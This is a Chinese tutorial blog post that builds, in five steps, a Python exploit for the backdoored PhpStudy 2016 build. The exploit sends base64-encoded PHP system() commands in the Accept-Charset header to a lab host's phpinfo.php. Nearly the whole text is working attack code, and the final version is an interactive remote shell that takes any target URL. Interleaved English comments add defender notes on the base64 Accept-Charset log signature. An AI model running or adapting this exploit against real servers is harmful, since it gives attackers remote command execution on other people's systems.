PhpStudy-RCE漏洞
首先看编写的着手点
基础环境
python编写工具:vscode
运行脚本:cmd窗口(管理员身份运行)
EXP编写
1、模拟数据包的发送
# GET /phpinfo.php HTTP/1.1
# Host: 192.168.153.232
# Upgrade-Insecure-Requests: 1
# User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# Referer: http://192.168.153.232/
# Content-Length: 0
# Accept-Charset: c3lzdGVtKCdpcGNvbmZpZycpOw==
# Accept-Encoding: gzip,deflate
# Accept-Language: en-US,en;q=0.9
# Connection: close
import requests
# HTTP client used for the single GET request below.
url = "http://192.168.153.232/phpinfo.php"
# Target: the phpinfo page on the lab host captured in the request above.
headers = {
"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36",
"Accept-Charset" : "c3lzdGVtKCdpcGNvbmZpZycpOw==",
"Accept-Encoding" : "gzip,deflate"
}
# Headers copied from the captured request. Accept-Charset holds a base64
# blob (it decodes to the PHP statement system('ipconfig');) rather than a
# charset name; paired with Accept-Encoding: gzip,deflate this is the header
# combination the backdoored PhpStudy build described on this page acts on.
# Defender note: a valid Accept-Charset value is a charset token, so a
# base64-looking Accept-Charset in web-server or proxy logs is the signature
# to alert on for this issue.
res = requests.get(url = url)
# NOTE: `headers` is built but never passed to requests.get, so this is a
# plain GET and the reply is the ordinary phpinfo page (step 2 fixes this).
print(res.text)
# Dump the full response body as text.
2、输出的内容不简洁,需要再次修改
import requests
# HTTP client used for the single GET request below.
url = "http://192.168.153.232/phpinfo.php"
# Target: the phpinfo page on the lab host.
headers = {
"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36",
"Accept-Charset" : "c3lzdGVtKCdpcGNvbmZpZycpOw==",
"Accept-Encoding" : "gzip,deflate"
}
# Accept-Charset carries base64-encoded PHP (system('ipconfig');) instead of
# a charset name; with Accept-Encoding: gzip,deflate this is the trigger the
# backdoored PhpStudy build responds to. Detection: Accept-Charset values
# that are not charset tokens (base64 blobs, '=' padding) in access logs.
res = requests.get(url = url, headers = headers)
# Unlike step 1 the headers are now actually sent with the request.
result = res.text[0:res.text.find("<!DOCTYPE html")]
# Keep only what precedes the phpinfo HTML: the injected command's output is
# emitted before the page itself. If the marker is absent, find() returns -1
# and the slice silently drops the last character of the body.
print(result)
# Print the trimmed output.
3、此时EXP的效果已初步实现:只需改变被编码的命令(如ipconfig)即可执行其他命令。为了更方便使用,需要让脚本自行对命令进行编码
import requests
# HTTP client used for the GET request below.
import base64
# Used to base64-encode the PHP statement placed in the Accept-Charset header.
url = "http://192.168.153.232/phpinfo.php"
# Target: the phpinfo page on the lab host.
cmd = "system('whoami');"
# The PHP statement to send; in steps 1-2 this was hard-coded as base64.
cmd = base64.b64encode(cmd.encode())
# Encode as UTF-8 bytes, then base64; the result is a bytes object, which
# requests accepts as a header value.
headers = {
"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36",
"Accept-Charset" : cmd,
"Accept-Encoding" : "gzip,deflate"
}
# Accept-Charset now carries the encoded statement; with
# Accept-Encoding: gzip,deflate this is the trigger the backdoored PhpStudy
# build reacts to. Defender note: a base64 blob where a charset token is
# expected is the log signature for this backdoor.
res = requests.get(url = url, headers = headers)
# Send the GET with the crafted headers.
result = res.text[0:res.text.find("<!DOCTYPE html")]
# Keep only the part before the phpinfo HTML (the command output). find()
# returns -1 when the marker is missing, which would drop the last character.
print(result)
# Print the trimmed output.
4、直接在cmd窗口输入命令
import requests
# HTTP client used for each GET request in the loop.
import base64
# Used to base64-encode the PHP statement placed in the Accept-Charset header.
url = "http://192.168.153.232/phpinfo.php"
# Target: the phpinfo page on the lab host.
while True :
    # Read one command per iteration from the console instead of editing the script.
    cmd = input("-->")
    # Prompt for the next command.
    if cmd == 'q!' :
        # The literal q! ends the session; it is checked before anything is sent.
        break
        # Leave the loop.
    cmd = f"system('{cmd}');"
    # Wrap the input in a PHP system() call. The input is interpolated
    # verbatim, so a single quote in it breaks the PHP statement.
    cmd = base64.b64encode(cmd.encode())
    # Encode as UTF-8 bytes, then base64 (a bytes object; requests accepts it).
    headers = {
    "User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36",
    "Accept-Charset" : cmd,
    "Accept-Encoding" : "gzip,deflate"
    }
    # Accept-Charset carries the encoded statement; with
    # Accept-Encoding: gzip,deflate this is the trigger the backdoored
    # PhpStudy build reacts to. Defender note: a base64 value in
    # Accept-Charset is the access-log signature for this backdoor.
    res = requests.get(url = url, headers = headers)
    # Send the GET with the crafted headers.
    result = res.text[0:res.text.find("<!DOCTYPE html")]
    # Keep only the part before the phpinfo HTML (the command output). find()
    # returns -1 when the marker is missing, which drops the last character.
    print(result)
    # Print the trimmed output.
5、对脚本进行美化,得到最终EXP
# GET /phpinfo.php HTTP/1.1
# Host: 192.168.153.232
# Upgrade-Insecure-Requests: 1
# User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# Referer: http://192.168.153.232/
# Content-Length: 0
# Accept-Charset: c3lzdGVtKCdpcGNvbmZpZycpOw==
# Accept-Encoding: gzip,deflate
# Accept-Language: en-US,en;q=0.9
# Connection: close
import requests
# HTTP client used by attack() below.
import base64
# Used to base64-encode the PHP statement placed in the Accept-Charset header.
import sys
# Command-line arguments (the target URL is taken from argv).
banner = '''
---------------------------------------------------------------------
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|p|h|p|s|t|u|d|y|2|0|1|6|r|c|e|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Usage: python *.py http://192.168.153.232/phpinfo.php
---------------------------------------------------------------------
'''
# Usage text shown when the script is run without a target; the author name
# could be added here too.
if len(sys.argv) < 2 :
    # No target URL was given on the command line.
    print(banner)
    # Show the usage banner ...
    exit()
    # ... and stop; nothing below runs. (exit() comes from the site module;
    # sys.exit() is the usual choice in scripts.)
url = sys.argv[1]
# Target URL, read from the first command-line argument; attack() reads this
# module-level name.
def attack(cmd) :
    """Send one PHP system() call to the target and return its textual output.

    Args:
        cmd: the shell command to wrap in ``system('...')``. It is interpolated
            verbatim, so a single quote in it breaks the PHP statement.

    Returns:
        The response body (decoded as gb2312) up to the start of the phpinfo
        HTML, i.e. the command output the backdoored build prepends.

    Reads the module-level ``url``. May raise UnicodeDecodeError if the
    response bytes are not valid gb2312.
    """
    cmd = f"system('{cmd}');"
    # Wrap the input in a PHP system() call.
    cmd = base64.b64encode(cmd.encode())
    # Encode as UTF-8 bytes, then base64 (a bytes object; requests accepts it).
    headers = {
    "User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36",
    "Accept-Charset" : cmd,
    "Accept-Encoding" : "gzip,deflate"
    }
    # Accept-Charset carries the encoded statement; with
    # Accept-Encoding: gzip,deflate this is the trigger the backdoored
    # PhpStudy build reacts to. Defender note: a base64 value in
    # Accept-Charset (a header that should hold a charset token) is the
    # access-log / WAF signature for this backdoor.
    res = requests.get(url = url, headers = headers)
    # Send the GET with the crafted headers.
    result = res.content.decode("gb2312")
    # Decode the raw bytes as gb2312 so Chinese console output displays
    # correctly (res.text would guess the encoding instead).
    result = result[0:result.find("<!DOCTYPE html")]
    # Keep only the part before the phpinfo HTML. find() returns -1 when the
    # marker is missing, which silently drops the last character.
    return result
    # Caller prints the result.
while True :
    # Interactive loop: one command per iteration until the user types q!.
    cmd = input("请输入命令 : ")
    # Prompt for the next command on the console.
    result = attack(cmd)
    # Send it and collect the trimmed output.
    print(result)
    # Show the output.
    if cmd == 'q!' :
        # q! ends the session. NOTE: the check runs after attack(), so the
        # literal q! is itself sent to the target once before the loop exits
        # (step 4 checked it before sending).
        break
        # Leave the loop.
有问题可以随时进行探讨哦!!!
#认真走好每一小步 请多指教
@L尘痕